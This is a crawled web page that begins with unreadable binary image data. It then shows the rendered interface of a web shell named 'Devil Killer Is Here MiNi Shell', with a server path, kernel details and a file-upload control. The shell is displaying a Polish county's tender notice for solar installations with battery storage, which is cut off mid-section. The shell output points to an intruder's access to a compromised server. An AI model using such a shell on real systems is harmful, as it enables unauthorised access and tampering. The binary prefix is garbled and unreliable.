JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251001/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251001/0045122501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, montaż i uruchomienie instalacji fotowoltaicznych wraz z magazynami energii dla budynków użyteczności publicznej w Powiecie Płońskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT PŁOŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130377712</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Płocka 39</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Płońsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@powiat-plonski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-plonski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, montaż i uruchomienie instalacji fotowoltaicznych wraz z magazynami energii dla budynków użyteczności publicznej w Powiecie Płońskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-322ba33c-c6fb-4c35-b1ea-74e6a07ef78c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00451225</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00020029/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Dostawa i montaż instalacji fotowoltaicznej wraz z magazynami energii w budynkach użyteczności publicznej w Powiecie Płońskim w ramach realizacji Wojewódzkiego Programu Ochrony Ludności i OC na r.2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-322ba33c-c6fb-4c35-b1ea-74e6a07ef78c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, dostępnej pod adresem: https://ezamowienia.gov.pl lub drogą<br/>elektroniczną przy użyciu poczty elektronicznej: zamowieniapubliczne@powiat-plonski.pl (nie dotyczy składania ofert)<br/>2. Za pośrednictwem środków komunikacji wymienionych w pkt 1 odbywać się będzie w szczególności przekazywanie:<br/>1) wniosków o wyjaśnienie treści SWZ,<br/>2) oświadczeń (innych niż składanych wraz z ofertą)<br/>3) wezwań i zawiadomień,<br/>4) dokumentów składanych na wezwanie Zamawiającego (w tym podmiotowych środków dowodowych),<br/>5) wyjaśnień składanych na wezwanie Zamawiającego,<br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się Numerem<br/>ogłoszenia o zamówieniu lub Numerem referencyjnym postępowania (ZP.272.37.2025) lub identyfikatorem postępowania<br/>dostępnym na platformie E-Zamówienia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu ,,Wykonawca” na platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania konta podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa regulamin Platformy e-Zamówienia dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje<br/>zamieszczone w zakładce ,,Centrum Pomocy”.<br/>2. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>korzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22/458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej: https://ezamowienia.gov.pl w zakładce ,,Zgłoś problem”.<br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się Numerem<br/>ogłoszenia o zamówieniu lub Numerem referencyjnym postępowania (ZP.272.37.2025) lub identyfikatorem postępowania<br/>dostępnym na platformie e-Zamówienia.<br/>4. Za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się<br/>potwierdzenie dostarczenia wiadomości zawierającej dokument/informację z serwera pocztowego Zamawiającego.<br/>5. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>6. Zmawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>7. W przypadku awarii platformy E-zamówienia, Zamawiający zastrzega sobie prawo do zamieszczania wszelkich informacji i<br/>komunikatów na stronie internetowej Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dn. 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), zwanego dalej „RODO”, informuję, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Starosta Płoński, ul. Płocka 39, 09-100 Płońsk, dane kontaktowe: adres email:<br/>urzad@powiat-plonski.pl<br/>2) Dane kontaktowe Inspektora Ochrony Danych: adres ul. Płocka 39, 09-100 Płońsk, e-mail: iod@powiat-plonski.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia postępowania oraz<br/>zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania<br/>zamówień publicznych spoczywający na Zamawiającym;<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 78 ustawy<br/>z dn. 11.09.2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp”.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia.<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8) Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego). a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9) Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest<br/>art. 6 ust. 1 lit. c RODO.<br/>2. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.37.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa, montaż i uruchomienie instalacji fotowoltaicznych wraz z magazynami energii dla budynków użyteczności publicznej w Powiecie Płońskim. Zamówienie podzielono na części w tym<br/>Część 1 zamówienia : Budynek Starostwa Powiatowego w Płońsku przy ul. Płockiej 39, 09-100 Płońsk.<br/>2. Instalacja fotowoltaiczna objęta przedmiotem zamówienia powinna działać w systemie off-grid (niepodłączona do elektroenergetycznej sieci dystrybucyjnej).<br/>Przedmiot zamówienia swoim zakresem obejmuje:<br/>1)	prace przygotowawcze przed dostawą i montażem instalacji fotowoltaicznej, w tym:<br/>˗	roboty pomiarowe związane z inwentaryzacją przebiegu istniejących instalacji, istniejącej rozdzielni elektrycznej oraz lokalizacji urządzeń w obszarach przewidzianych pod montaż urządzeń i infrastruktury, celem potwierdzenia poprawności doboru urządzenia<br/>2)	przygotowanie dokumentacji projektowej, wraz z uzyskaniem wszelkich niezbędnych zgód, pozwoleń i uzgodnień wymaganych przepisami prawa<br/>3)	dostawę i montaż do wyznaczonych miejsc nowej instalacji fotowoltaicznej, w tym<br/>˗	dostawa i montaż konstrukcji wsporczych (dachowych w przypadku części zamówienia dotyczącej montażu na dachu, lub wolnostojącej w przypadku montażu na gruncie)<br/>˗	dostawa i montaż paneli fotowoltaicznych.<br/>˗	dostawa i montaż inwerterów (falowników) hybrydowych współpracujących z systemem magazynowania.<br/>˗	dostawa i montaż dedykowanych magazynów energii, wraz z przystosowaniem pomieszczenia przeznaczonego na magazyn do obecnie obowiązujących przepisów i warunków technicznych<br/>˗	wykonanie niezbędnych prac ziemnych i towarzyszących prac budowlanych<br/>4)	dokonanie przyłączenia instalacji fotowoltaicznej w tym<br/>˗	wykonanie okablowania DC i AC wraz z zabezpieczeniami dla systemów PV i ME<br/>˗	wykonanie tras kablowych i przyłączenie instalacji PV i ME do wewnętrznej sieci Zamawiającego.<br/>˗	integracja systemów PV z magazynami energii i siecią elektroenergetyczną.<br/>˗	dostawa i montaż systemów zarządzania energią i monitoringu dla PV i ME.<br/>˗	przeprowadzenie testów, pomiarów i uruchomienie kompletnych systemów PV+ME.<br/>˗	uzyskanie niezbędnych pozwoleń, zgód i dokonanie odbiorów (w tym u Operatora Systemu Dystrybucyjnego).<br/>5)	przeprowadzenie szkolenia pracowników ww. urzędów i jednostek organizacyjnych w zakresie obsługi kompletnej instalacji i zintegrowanych urządzeń wraz z podzespołami oraz wsparcie techniczne.<br/>6)	przygotowanie dokumentacji powykonawczej, która swoim zakresem obejmować będzie m.in. dane techniczne instalacji fotowoltaicznej, schematy podłączenia, karty materiałowe instalacji, instrukcje BHP, instrukcję serwisową urządzeń, wymagane potwierdzenia zgodności, projekt techniczny z naniesionymi zmianami (jeśli takowe wystąpią) oraz wszelkie inne dokumenty i opracowania niezbędne do przekazania inwestycji do użytkowania i eksploatacji.<br/>6.	Wszystkie postanowienia SWZ dotyczą w takim samym zakresie pierwszej, drugiej i trzeciej części zamówienia, chyba, że zastrzeżono inaczej.<br/>7.	Jeżeli w SWZ lub załącznikach do niej w szczególności w opisie przedmiotu zamówienia użyte zostały znaki towarowe, patenty lub pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę mają one wyłącznie charakter przykładowy, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać dostawy, aby spełnić wymagania stawiane przez Zamawiającego. Należy przyjąć, iż stanowią one tylko wskazania i mają na celu jedynie doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania, a Wykonawca nie jest zobowiązany do ich zastosowania. Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w SWZ lub załącznikach do niej, zawarto odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, europejskiej ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne&#34;. Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>8.	Wykonawca zobowiązany jest wykonać przedmiot zamówienia zgodnie z SWZ, załącznikami do niej oraz obowiązującymi normami i standardami.<br/>9.	Wykonawca oświadcza, że posiada wiedzę i doświadczenie gwarantujące należyte wykonanie przedmiotu zamówienia. <br/>10.	Szczegółowy opis przedmiotu zamówienia określający w szczególności ilość, parametry i wymagania Zamawiającego co do przedmiotu dostawy zawarty został w Załączniku Nr 9 i Załącznikach nr 9.1 (załączniki do OPZ) do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09332000-5 - Instalacje słoneczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331000-8 - Baterie słoneczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty, spośród ofert Wykonawców, którzy spełniają<br/>warunki udziału w postępowaniu oraz warunki określone w SWZ zastosuje następujące kryteria:<br/>1) cena oferty (C) - 60%<br/>2) okres gwarancji (G) - 40 %<br/>Informacja o sposobie oceny ofert.<br/>1) Cena oferty (C) 60% - 60 pkt<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższego wzoru:<br/>Cena najniższa/cena badana x 60= ilość punktów w kryterium cena<br/>Kryterium oferty będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w<br/>formularzu Oferty. Oferta z najniższą ceną otrzyma w tym kryterium maksymalnie 60 pkt.<br/>2) Okres gwarancji (G) 40% - 40 pkt<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższych postanowień:<br/>Gwarancja badana/gwarancja najdłuższa x 40= ilość punktów w kryterium cena<br/>Kryterium „ okres gwarancji” będzie oceniane na podstawie okresu udzielonej przez Wykonawcę gwarancji jakości na zrealizowany<br/>przedmiot zamówienia podanej przez Wykonawcę w formularzu oferty. Okres gwarancji liczony jest od daty dnia podpisania<br/>protokołu odbioru przedmiotu zamówienia.<br/>Minimalny okres udzielonej gwarancji na wykonany przedmiot zamówienia wymagany przez Zamawiającego to okres 36 miesięcy,<br/>zaś okres maksymalny to 60 miesięcy. Przy ocenie ofert będzie brany pod uwagę okres udzielonej gwarancji (w pełnych<br/>miesiącach), ponad minimum wymagane w zamówieniu tj. ponad 36 miesięcy. Oznacza to, że Wykonawca otrzyma punkty za w/w<br/>kryterium oceny ofert jeśli zaproponuje okres gwarancji wyższy niż 36 miesięcy. W przypadku zaoferowania minimalnego,<br/>wymaganego okresu gwarancji (36 miesięcy) Wykonawca otrzyma 0 pkt w ww. kryterium oceny ofert. Maksymalny okres gwarancji<br/>podlegający punktacji to 60 miesięcy. Oznacza to, że Wykonawca, który zaproponuje 60 miesięcy gwarancji otrzyma maksymalną<br/>liczbę punktów w tym kryterium tj 40 pkt. Jeżeli Wykonawca nie zadeklaruje w formularzu oferty okresu gwarancji w miesiącach,<br/>wówczas Zamawiający przyjmie minimalny okres gwarancji wynoszący 36 miesięcy, a Wykonawca otrzyma 0 pkt w kryterium „okres<br/>gwarancji”. W przypadku zadeklarowania w formularzu oferty okresu gwarancji mniejszego niż 36 miesięcy, Zamawiający odrzuci<br/>ofertę ponieważ jej treść nie będzie zgodna z warunkami Zamówienia.<br/>Za najkorzystniejszą Zamawiający uznana ofertę, która uzyska największą liczbę punktów w wyniku zsumowania punktów w<br/>kryterium ,,cena „ i ,,okres gwarancji” według poniższego wzoru:<br/>Łączna liczba punktów ocenianej oferty = C+G<br/>Ilość punktów w kryterium ,,cena”, ,,okres gwarancji” oraz łączna liczba punktów będą obliczane z dokładnością do dwóch miejsc po<br/>przecinku z zastosowaniem matematycznej zasady zaokrąglania do drugiego miejsca po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający 